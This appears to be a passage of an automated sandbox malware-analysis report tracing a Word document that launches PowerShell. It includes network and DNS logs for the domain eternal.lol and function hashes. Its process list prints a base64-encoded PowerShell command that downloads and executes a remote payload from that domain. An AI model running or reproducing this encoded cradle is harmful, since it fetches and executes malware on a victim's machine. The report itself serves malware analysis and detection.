                                                        Jan 6, 2025 06:07:14.036477089 CET53527761.1.1.1192.168.2.24
                                                        Jan 6, 2025 06:07:14.036823988 CET5277653192.168.2.241.1.1.1
                                                        Jan 6, 2025 06:07:14.041780949 CET53527761.1.1.1192.168.2.24
                                                        Jan 6, 2025 06:07:14.041920900 CET5277653192.168.2.241.1.1.1
                                                        Jan 6, 2025 06:07:16.920353889 CET52782443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:07:16.920391083 CET44352782192.64.119.42192.168.2.24
                                                        Jan 6, 2025 06:07:16.920536041 CET52782443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:07:16.933629036 CET52782443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:07:16.933645964 CET44352782192.64.119.42192.168.2.24
                                                        Jan 6, 2025 06:07:59.759612083 CET44352782192.64.119.42192.168.2.24
                                                        Jan 6, 2025 06:07:59.759762049 CET52782443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:07:59.775595903 CET52782443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:07:59.775609016 CET44352782192.64.119.42192.168.2.24
                                                        Jan 6, 2025 06:07:59.777343988 CET52794443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:07:59.777380943 CET44352794192.64.119.42192.168.2.24
                                                        Jan 6, 2025 06:07:59.777455091 CET52794443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:07:59.778399944 CET52794443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:07:59.778420925 CET44352794192.64.119.42192.168.2.24
                                                        Jan 6, 2025 06:08:42.543309927 CET44352794192.64.119.42192.168.2.24
                                                        Jan 6, 2025 06:08:42.543428898 CET52794443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:08:42.544135094 CET52794443192.168.2.24192.64.119.42
                                                        Jan 6, 2025 06:08:42.544161081 CET44352794192.64.119.42192.168.2.24

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 6, 2025 06:07:13.552164078 CET53518451.1.1.1192.168.2.24
                                                        Jan 6, 2025 06:07:16.903330088 CET5184553192.168.2.241.1.1.1
                                                        Jan 6, 2025 06:07:16.913852930 CET53518451.1.1.1192.168.2.24

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 6, 2025 06:07:16.903330088 CET192.168.2.241.1.1.10xe37bStandard query (0)eternal.lolA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 6, 2025 06:07:16.118557930 CET1.1.1.1192.168.2.240x8a50No error (0)scdn1cc4b.wpc.9aea3.sigmacdn.netsni1gl.wpc.sigmacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Jan 6, 2025 06:07:16.118557930 CET1.1.1.1192.168.2.240x8a50No error (0)sni1gl.wpc.sigmacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                        Jan 6, 2025 06:07:16.913852930 CET1.1.1.1192.168.2.240xe37bNo error (0)eternal.lol192.64.119.42A (IP address)IN (0x0001)false

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:00:07:09
                                                        Start date:06/01/2025
                                                        Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                        Imagebase:0x7ff7d8c70000
                                                        File size:1'637'952 bytes
                                                        MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:00:07:13
                                                        Start date:06/01/2025
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
                                                        Imagebase:0x7ff7dbf70000
                                                        File size:450'560 bytes
                                                        MD5 hash:9D8E30DAF21108092D5980C931876B7E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:00:07:13
                                                        Start date:06/01/2025
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6038b0000
                                                        File size:1'040'384 bytes
                                                        MD5 hash:9698384842DA735D80D278A427A229AB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Disassembly

                                                        Code Analysis

                                                        Call Graph

                                                        • Entrypoint
                                                        • Decryption Function
                                                        • Executed
                                                        • Not Executed
                                                        • Show Help
                                                        callgraph 1 Error: Graph is empty

                                                        Module: __Unknown_Module_Name__

                                                        Declaration
                                                        LineContent

                                                        Module: __Unknown_Module_Name__

                                                        Declaration
                                                        LineContent
                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FFCC951078D Relevance: .5, Instructions: 455COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724884332.00007FFCC9510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9510000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e78a25e1bfc146d7bf638ebdb23718b1b81f54db93f388f619af8a6946047f6
                                                          • Instruction ID: 003f1a3faf71e8e76f31587182c05f885f0fd718ba6b75764d3bc55d8c79e4e8
                                                          • Opcode Fuzzy Hash: 4e78a25e1bfc146d7bf638ebdb23718b1b81f54db93f388f619af8a6946047f6
                                                          • Instruction Fuzzy Hash: 88D1C352E0EAD98FE7A69E7808751B57FF0DF56214B0812FBD08DCB493D9186C06D3A1
                                                          Function 00007FFCC951085A Relevance: .1, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724884332.00007FFCC9510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9510000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 502781cf1123e0e32161eaedc047d9d2050719549bbd928af285414b11dbf518
                                                          • Instruction ID: a24f599ea45aa359381aea0bc01b73080bb7f8fba9d6f9f549012c275eec3bb4
                                                          • Opcode Fuzzy Hash: 502781cf1123e0e32161eaedc047d9d2050719549bbd928af285414b11dbf518
                                                          • Instruction Fuzzy Hash: 8B31C562E1EAFE5FF7A5AE7808751786AE0EF55214B4812BFC44DC79C3DD08AC01D2A1
                                                          Function 00007FFCC9443945 Relevance: .1, Instructions: 85COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724495947.00007FFCC9440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9440000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9440000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08cb8f305eb77ef8e84aedd152caaa946e99f9d399a4ba58fcd6ea53d4c76114
                                                          • Instruction ID: 6250b56534375371548a6702325e0b92af059f9639c4155b658b6901f614be44
                                                          • Opcode Fuzzy Hash: 08cb8f305eb77ef8e84aedd152caaa946e99f9d399a4ba58fcd6ea53d4c76114
                                                          • Instruction Fuzzy Hash: 4B21C73021CB594FD749EF18D4A16B977E1FF95314F10097DD08AC3992EB26A441C745
                                                          Function 00007FFCC95134FE Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724884332.00007FFCC9510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9510000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0796201bc73cd4950e406b18c8962cf250c3dcbc0edf968a7d0141d8745a8fa3
                                                          • Instruction ID: 5435e62c8d8f0f4900d52501c66d561522497dbef9a9b4bda982156cc6de9580
                                                          • Opcode Fuzzy Hash: 0796201bc73cd4950e406b18c8962cf250c3dcbc0edf968a7d0141d8745a8fa3
                                                          • Instruction Fuzzy Hash: 33110472E0D6D94FEB95EE5848A45A8BBB1EF09611B1902FAC40CC7883DB35A804C360

                                                          Non-executed Functions

                                                          Function 00007FFCC944239D Relevance: 8.0, Strings: 6, Instructions: 455COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724495947.00007FFCC9440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9440000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9440000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: z_^$z_^$z_^$z_^$z_^$z_^
                                                          • API String ID: 0-3801612629
                                                          • Opcode ID: 27337e18a83979f9381293b66635e0ef57756dcb707a0697ded3b3d3e8e3ed3d
                                                          • Instruction ID: e472e2bf0475398dacab4c14cdee09894781440658164e1fb0c068485967b9cc
                                                          • Opcode Fuzzy Hash: 27337e18a83979f9381293b66635e0ef57756dcb707a0697ded3b3d3e8e3ed3d
                                                          • Instruction Fuzzy Hash: 10819593D0EAEB5FF2179E285CA50E97F50EF62254B1E10FAC0C44BC93ED19A806C271
                                                          Function 00007FFCC94428E2 Relevance: 7.6, Strings: 6, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.12724495947.00007FFCC9440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCC9440000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_7ffcc9440000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: z_^$z_^$z_^$z_^$z_^$z_^
                                                          • API String ID: 0-789656038
                                                          • Opcode ID: 64c4070c7e2e163868426b9ce391ab84d3e49f8ede3696efda44669abaf7f530
                                                          • Instruction ID: bff9b78f426bc3e1315ea2e5a04593b5046b6a2f194fc8cf9c2c2bf9766fa8bb
                                                          • Opcode Fuzzy Hash: 64c4070c7e2e163868426b9ce391ab84d3e49f8ede3696efda44669abaf7f530
                                                          • Instruction Fuzzy Hash: FB41639391E7DB4EE3169E380CB41953FA1EF63214B4E12EBD0D44F4D7AC59A80AC366